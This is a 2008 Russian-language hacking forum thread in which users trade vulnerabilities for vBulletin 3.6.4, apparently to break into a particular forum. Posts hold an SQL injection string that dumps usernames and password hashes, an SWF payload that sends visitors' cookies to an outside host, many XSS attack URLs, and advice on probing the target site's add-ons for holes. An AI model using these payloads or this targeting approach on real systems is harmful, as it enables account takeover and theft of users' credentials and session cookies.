Вопрос. Уязвимости vBulletin 3.6.4
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-11 23:23:14.326666
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
В общем полазил по сети в поисках багов, нашел, но там достаточно старое, и не все мне подходит.[:(]
У кого есть побольше инфой, не фпадло, поделитесь:)
ЗЫ, единственное что норм попалось, это тема с swf, но у меня там что-то не очень…если кто-нить разъяснит - буду очень признателен.
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:26:15.446666
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
Уязвимости vBulletin 3.6.4
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии модератора)
http://milw0rm.com/exploits/3387
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://www.xakep.ru/post/36982/default.asp
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:36:23.890000
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
SQL Injection в админке (тестировалось на версиях 3.6.4 и 3.6.5 )
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
==============
Ну и собственно бага со swf.
Ты лучше напиши известные хаки, установленные на форуме. Проще будет к ним поискать уязвимости/сплоиты.
Если же с самим форумом ничего не получится, возможно будет проще поискать уязвимости в скриптах на сайте, если имеется такая возможность.
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 01:41:32.493333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
1)Уязвимость позволяет удаленному злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке входящих запросов. Атакующий может выполнить SWF произвольный сценарий и выкрасть данные аутентификации cookie.
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java script';scriptNode.src= 'http://www.Yousite.ru/UrPHPpage.php?Cookie='+document.cookie +;blab();");
2)vBulletin 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
3)vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege (Требуются привилегии модератора)
http://milw0rm.com/exploits/3387
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «postids» сценарием inlinemod.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://www.xakep.ru/post/36982/default.asp
4)XSS vBulletin 3.6.X Admin Control Painel
http://example/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs
= "><script>alert("insanity")</script>
http://example/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navpre
fs= "><script>alert("insanity")</script>
Вот собрал 4 уязвимости, к сожалению мне ни одна не подходит…((
Вообще на сайте баги поискал и "в ручную" - ниче не дало…
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 13:58:46.310000
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
Вот еще по версии 3,6,8
3.6.8 Patch.Level 1
active xss:
если вы модератор на форуме, то при бане в поле "причина бана" указываете ваш скрипт, и он сработает:
при просмотре забаненых пользователей через:
модпанель(например туда может зайти СуперМодератор)
админ панель(админ)
когда зайдёт юзер в свой акк(сам юзер)
clientscript/ieprompt.html
какойто недописанный скрипт.
global.php или arhive/global.php
vBulletin V3.6.8
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript&match=
all&titlesonly=0
[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F
script&match=all&titlesonly=1
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0
[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2Fscript&
match=all&titlesonly=0
[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28documen t.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-12 22:58:18.540000
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
Чувак, если начал тему про версию 3.6.4 , то и пиши про неё.
Вот актуальный вопрос по теме:
quote:
Ты лучше напиши известные хаки, установленные на форуме. Проще будет к ним поискать уязвимости/сплоиты.
quote:
ну это я его попросил:)
А, ну это многое меняет)
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-13 09:16:47.366666
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
quote:
Чувак, если начал тему про версию 3.6.4 , то и пиши про неё.
ну это я его попросил:)
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-18 05:35:08.980000
|
|
|
rr3
Сообщений: 1
Оценки: 0
Присоединился: 2008-06-17 14:24:14.573333
|
А можно сразу готовый файл получить?
|
|
|
|
|
RE: Вопрос. Уязвимости vBulletin 3.6.4 - 2008-06-18 11:50:06.743333
|
|
|
[ TRaY ]
Сообщений: 919
Оценки: 0
Присоединился: 2008-03-22 18:47:37.556666
|
Какой файл? Оо
|
|
|
|
|
|
